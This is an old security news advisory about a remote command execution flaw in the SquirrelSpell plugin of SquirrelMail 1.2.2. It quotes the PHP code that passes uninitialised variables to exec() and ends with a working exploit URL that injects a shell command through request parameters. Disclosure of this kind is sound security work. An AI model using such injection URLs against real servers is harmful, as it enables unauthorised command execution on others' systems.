Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Squirrelmail remote execute commands bug

Squirrelmail remote execute commands bug

by Nikola Strahija on January 24th, 2002 Squirrelmail is a webmail system, which allows users to send, get, read etc. mails. Version affected is 1.2.2. There is available exploit.


Version Affected :
1.2.2

Squirrelmail is a webmail system, which allows users to send, get, read etc.
mails. It has some themes, plugins etc. One of the plugins has a very
interesting piece of code :

from file check_me.mod.php :

$sqspell_command = $SQSPELL_APP[$sqspell_use_app];
...
$floc = "$attachment_dir/$username_sqspell_data.txt");
...
exec ("cat $floc | $sqspell_command", $sqspell_output);


Everything should be ok, but where this page includes config files, where
are defined $attachment_dir and others ? Answer: Nowhere. We can set up
variables $sqspell_command and $floc. Result ? We can execute any command
of course as a http serwer owner.

Exploit :

host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%
20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »